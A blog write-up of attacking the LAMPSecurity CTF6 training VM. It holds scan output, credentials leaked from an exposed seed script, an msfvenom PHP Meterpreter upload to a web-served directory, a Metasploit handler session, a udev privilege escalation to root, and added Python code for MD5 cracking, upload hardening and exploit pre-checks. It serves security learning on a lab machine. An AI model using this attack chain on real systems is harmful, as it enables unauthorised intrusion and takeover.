Pen Testing – LAMPSecurity (CTF6)

Introduction

I recently learned about VulnHub, a site where you can download and attack demo machines that others have shared. It is very useful if you are looking to learn about security or advance your existing skills. In this post I target the LAMPSecurity: CTF6 machine. Setup is simple: I downloaded the VM, converted the disk image to qcow2 format and booted it with KVM.


Recon/Scanning

To start off I wanted to see which ports and services were exposed, so I ran a scan to gather more information.

The first hurdle is that the machine gets its address from DHCP, so I need to find its IP before I can scan it. A ping sweep of the local /24 does that:

# nmap -sP 192.168.1.0/24

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-22 21:03 EDT
Nmap scan report for 192.168.1.211
Host is up (0.00011s latency).
MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)
Nmap scan report for 192.168.1.1
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.38 seconds

192.168.1.1 is my gateway, so the other live host, 192.168.1.211, must be the target; the QEMU virtual NIC MAC address confirms it is the VM I just booted. With the address known I can scan its ports and grab service banners:

# nmap -sS -sV 192.168.1.211
Nmap scan report for 192.168.1.211
Host is up (0.00013s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2 (RPC #100000)
143/tcp  open  imap     Dovecot imapd
443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
993/tcp  open  ssl/imap Dovecot imapd
995/tcp  open  ssl/pop3 Dovecot pop3d
3306/tcp open  mysql    MySQL 5.0.45
MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)

Port 80 is Apache, so I scanned it with nikto to see whether any interesting pages or directories are available.

# nikto -h http://192.168.1.211/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.211
+ Target Hostname:    192.168.1.211
+ Target Port:        80
+ Start Time:         2016-04-22 21:25:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 17:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8496 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2016-04-22 21:25:14 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The /sql/ directory has indexing enabled, and browsing to it reveals db.sql, the database seed script. It opens in the browser without any authentication and contains some interesting data:

CREATE database IF NOT EXISTS cms;

use mysql;

GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password';

use cms;

DROP TABLE IF EXISTS user;
DROP TABLE IF EXISTS event;
DROP TABLE IF EXISTS log;

CREATE TABLE IF NOT EXISTS user (
user_id int not null auto_increment primary key,
user_username varchar(50) not null,
user_password varchar(32) not null
);

CREATE TABLE IF NOT EXISTS event (
event_id int not null auto_increment primary key,
event_title varchar(255) not null,
event_body text,
event_file varchar(255) default null,
user_id int not null,
event_hits int default 0
);

CREATE TABLE IF NOT EXISTS log (
log_id int not null auto_increment primary key,
log_ip varchar(20),
log_referer varchar(255),
log_useragent varchar(255)
);

DELETE FROM user;
DELETE FROM event;
DELETE FROM log;

INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');

...

Exploitation

The most interesting part is that the admin password for the web application appears in cleartext: the table only stores an unsalted MD5 hash, but the script that seeds it leaks the password itself (and the MySQL account credentials on the GRANT line as well). Even without the cleartext, an unsalted MD5 of a short password would be cheap to crack. So naturally I tried the credentials on the web interface, and they worked!
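As an added example (my code, not anything from the original post or the CTF), here is how I would pull the credentials out of an exposed seed script like this one and show why the stored hash adds little protection. The SQL fragment is the page's own db.sql content, embedded as a constructed sample so the script runs offline; the wordlist is a made-up stand-in for a real one.

```python
"""Extract credentials from an exposed MySQL seed script (added example).

The SQL below is the fragment from /sql/db.sql shown on this page, embedded
as a constructed sample so the script runs offline.
"""
import hashlib
import re

DB_SQL = """
CREATE database IF NOT EXISTS cms;
use mysql;
GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password';
use cms;
INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');
"""

# GRANT ... TO 'user'@'host' IDENTIFIED BY 'password'  (MySQL 5.0 syntax)
GRANT_RE = re.compile(
    r"GRANT\s+.+?\s+TO\s+'([^']+)'@'([^']+)'\s+IDENTIFIED\s+BY\s+'([^']*)'",
    re.IGNORECASE,
)
# INSERT INTO user SET ... user_username='x', user_password=md5('y')
INSERT_RE = re.compile(
    r"user_username\s*=\s*'([^']+)'\s*,\s*user_password\s*=\s*md5\('([^']*)'\)",
    re.IGNORECASE,
)


def extract_credentials(sql):
    """Return (kind, principal, secret) for every credential leaked in the script."""
    creds = []
    for m in GRANT_RE.finditer(sql):
        creds.append(("mysql", "%s@%s" % (m.group(1), m.group(2)), m.group(3)))
    for m in INSERT_RE.finditer(sql):
        creds.append(("app", m.group(1), m.group(2)))
    return creds


def md5_hex(password):
    """What MySQL's md5() stores in user_password: unsalted, 32 hex characters."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(target_hex, wordlist):
    """Offline guess against an unsalted MD5: one hash per candidate, nothing slows it down."""
    for candidate in wordlist:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    for kind, who, secret in extract_credentials(DB_SQL):
        print("%-5s %-25s %s" % (kind, who, secret))
    # Constructed wordlist standing in for a real one such as rockyou.txt.
    stored = md5_hex("adminpass")
    print("cracked:", crack_md5(stored, ["123456", "password", "admin", "adminpass"]))
```

The point of the second half: because user_password is an unsalted MD5, identical passwords hash identically across users and a dictionary run costs one hash per guess, so the hash alone would not have kept the admin account safe for long even if db.sql had not leaked the cleartext.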


Logged in as admin, I clicked the Add Event tab and found that the form accepts a file upload, which looked like a chance to upload a PHP payload and have the server execute it. First, however, I wanted to be sure there was a way to reach the files after upload. Looking back at the nikto scan, there was a directory listing for /files/, and visiting it in the browser shows that this is where the application stores uploaded files: inside the web root, where Apache will execute a .php file just like any other page.

With that known I fired up a Kali VM and generated a PHP Meterpreter payload with msfvenom. Note that this is a bind_tcp payload, not a reverse one: when it runs it listens on port 4444 on the target and the handler connects to it, which is why the handler below is configured with RHOST rather than LHOST.

root@kali:~# msfvenom -p php/meterpreter/bind_tcp R > out.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1188 bytes

Now I just uploaded the script to the site using the form and confirmed it shows up in the files directory.
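The form above accepted a .php file and stored it, under its own name, in the web-served /files/ directory. As an added example (mine, not the CTF application's PHP), the following contrasts that behaviour with the checks a hardened upload handler applies. The directory paths and the allowed file types are assumptions.

```python
"""Upload handling: the weak behaviour seen on this page next to a hardened version.

Added example, not the CTF application's code. Paths are assumptions.
"""
import os
import secrets

WEB_ROOT_FILES = "/var/www/html/files"    # assumed: the served /files/ directory
PRIVATE_UPLOADS = "/var/lib/cms/uploads"  # assumed: outside the document root

# Allowed types with the magic bytes the content must start with.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
# Extensions mod_php / common AddHandler lines will execute server-side.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "phps"}
# Naive PHP tag scan: a mitigation for image/PHP polyglots, not a substitute
# for never handing uploads to the interpreter.
PHP_TAGS = (b"<?php", b"<?=", b'<script language="php"')


def vulnerable_store_path(client_filename):
    """What CTF6 effectively does: keep the client's name, write under the web root."""
    return os.path.join(WEB_ROOT_FILES, os.path.basename(client_filename))


def hardened_store_path(client_filename, content):
    """Return a safe path for the upload or raise ValueError explaining the rejection.

    - every dotted component is checked, so shell.php.jpg is rejected, not just shell.php
    - the final extension must be allow-listed and the magic bytes must agree with it
    - the on-disk name is random, so the client never chooses what gets written
    - the directory is outside the document root; a download handler serves it later
    """
    name = os.path.basename(client_filename).lower()
    exts = [p for p in name.split(".")[1:] if p]
    if not exts:
        raise ValueError("no extension")
    if any(e in EXECUTABLE_EXTS for e in exts):
        raise ValueError("executable extension in name")
    ext = exts[-1]
    magic = ALLOWED_MAGIC.get(ext)
    if magic is None:
        raise ValueError("extension not allowed")
    if not content.startswith(magic):
        raise ValueError("content does not match extension")
    if any(tag in content for tag in PHP_TAGS):
        raise ValueError("PHP tag embedded in content")
    return os.path.join(PRIVATE_UPLOADS, secrets.token_hex(16) + "." + ext)


def is_rejected(client_filename, content):
    """True if the hardened handler refuses the upload."""
    try:
        hardened_store_path(client_filename, content)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed samples: a PHP payload stub and a minimal PNG header.
    shell = b"<?php /* payload */ ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("vulnerable handler stores at:", vulnerable_store_path("reverse-shell.php"))
    for fname, body in [("reverse-shell.php", shell), ("shell.php.jpg", png),
                        ("photo.png", png + shell), ("photo.png", png)]:
        print(fname, "rejected" if is_rejected(fname, body) else "accepted")
```

The content checks are defence in depth; the control that actually matters is that nothing under the upload directory is ever handed to the PHP interpreter, whether by storing uploads outside the document root as above or, at minimum, by disabling PHP for that directory in the Apache configuration (php_admin_flag engine off inside a Directory block for /files/).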


All that was left was to start the handler on the Kali VM and trigger the payload. Because this is a bind payload, the handler does not sit waiting for a callback; it connects out to port 4444 on the target, which is what the session line below shows (Kali's ephemeral port 41387 connecting to 192.168.1.211:4444). As soon as I clicked the uploaded file (reverse-shell.php) in the /files/ listing, Apache executed it and a Meterpreter session opened in the Metasploit console. Success!

root@kali:~# msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 192.168.1.211
RHOST => 192.168.1.211
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 192.168.1.211
[*] Meterpreter session 1 opened (192.168.1.131:41387 -> 192.168.1.211:4444) at 2016-04-22 03:29:08 -0400

meterpreter > getuid
Server username: apache (48)

Excellent, but the shell runs as the apache user, so I needed a local privilege escalation to take over the system. After some research I found a udev exploit (https://www.exploit-db.com/exploits/8478/) that this system appeared to be vulnerable to. The bug (CVE-2009-1185, fixed upstream in udev 141) is that udevd did not check that the netlink messages it received actually came from the kernel, so any local user could send it a forged device event and have it run a program of their choosing as root. A CentOS 5 box installed in mid-2009 (note the June 2009 dates in the listing further down) is a plausible target.

I copied the exploit script to the target, set the execute bit and ran it. The script compiles two small C programs into /tmp and then sends the forged netlink message; its single argument is the PID of udevd's netlink socket (422 here), which you can read from /proc/net/netlink as the non-zero Pid on the line whose Eth (protocol) column is 15, NETLINK_KOBJECT_UEVENT.

./a.sh 422
/usr/bin/ld: cannot open output file /tmp/udev: Permission denied
collect2: ld returned 1 exit status
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
/usr/bin/ld: cannot open output file /tmp/suid: Permission denied
collect2: ld returned 1 exit status

# id
uid=0(root) gid=0(root) groups=48(apache)
# touch pwn
# ls -l
total 40
-rw------- 1 root root  1045 Jun  2  2009 anaconda-ks.cfg
-rw-r--r-- 1 root root 17219 Jun  2  2009 install.log
-rw-r--r-- 1 root root  3419 Jun  2  2009 install.log.syslog
-rw-r--r-- 1 root root     0 Apr 23 19:08 pwn

The linker errors are worth a note: gcc could not write /tmp/udev and /tmp/suid, most likely because copies already existed that the apache user could not overwrite, yet the script still executed them and the uid=0 shell shows the escalation worked. On a fresh box, clear stale copies out of /tmp first so you know the binaries you run are yours. Note also that the new root shell keeps the apache group (groups=48(apache)) and, judging by anaconda-ks.cfg and the install logs, lands in /root, where touch pwn succeeds.

So there we go: directory indexing exposed a seed script, the seed script leaked the admin password, the admin panel let me drop executable PHP into the web root, and an unpatched udev turned the web server account into root. Fixing any single link (no directory listings, no secrets in served files, uploads validated and stored outside the document root, the udev update applied) would have broken the chain.
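Before running a udev exploit like the one above it is worth confirming the two things it depends on: that the installed udev predates the CVE-2009-1185 fix, and which netlink PID to pass. As an added example (my code, not part of the original post and not the exploit's own code), the following does both against constructed sample input; the /proc/net/netlink text is made up to match the page's argument of 422, and the version strings are illustrative.

```python
"""Pre-checks for CVE-2009-1185 (udevd trusting userspace netlink messages).

Added example, not the exploit's own code. Sample inputs are constructed.
"""
import re

NETLINK_KOBJECT_UEVENT = 15  # netlink protocol udevd listens on (linux/netlink.h)
UDEV_FIXED_VERSION = 141     # upstream release that added the sender check

# Constructed /proc/net/netlink contents in the 2.6-era layout:
# sk Eth Pid Groups Rmem Wmem Dump Locks. Eth is the protocol; Pid 0 is the kernel side.
SAMPLE_PROC_NET_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
ffff81007f8f0c00 0   0      00000000 0        0        0000000000000000 2
ffff81007f8f3400 15  0      00000000 0        0        0000000000000000 2
ffff81007f8f3800 15  422    00000001 0        0        0000000000000000 2
ffff81007f8f0800 16  0      00000000 0        0        0000000000000000 2
"""


def uevent_listener_pids(proc_net_netlink_text):
    """PIDs of userspace sockets bound to NETLINK_KOBJECT_UEVENT (udevd's, on a 2009 box).

    This is the integer the exploit takes as its argument (422 in the run above).
    Pid 0 is the kernel endpoint and is skipped.
    """
    pids = []
    for line in proc_net_netlink_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 3:
            continue
        try:
            proto, pid = int(fields[1]), int(fields[2])
        except ValueError:
            continue
        if proto == NETLINK_KOBJECT_UEVENT and pid != 0:
            pids.append(pid)
    return pids


def udev_version_vulnerable(version_output):
    """Heuristic: True if the reported udev version predates the upstream fix.

    Accepts output such as 'udevinfo, version 095' (CentOS 5 era) or a bare
    '141' from udevadm --version. Returns None if no version number is found.
    Vendors backport fixes without bumping the number, so treat True as
    'check the distro advisory', not as proof of exploitability.
    """
    m = re.search(r"\b(\d{2,3})\b", version_output)
    if not m:
        return None
    return int(m.group(1)) < UDEV_FIXED_VERSION


if __name__ == "__main__":
    print("uevent listener PIDs:", uevent_listener_pids(SAMPLE_PROC_NET_NETLINK))
    for v in ("udevinfo, version 095", "141", "no version here"):
        print(repr(v), "->", udev_version_vulnerable(v))
```

On a live target you would feed the real file and the real version string in (open("/proc/net/netlink").read() and the output of udevinfo -V or udevadm --version); the functions are separated from the I/O so they can be exercised offline as above.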

If you found this post interesting, stay tuned I plan on doing some more in the future.

This entry was posted in Bash, Hardening, Linux, Security.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s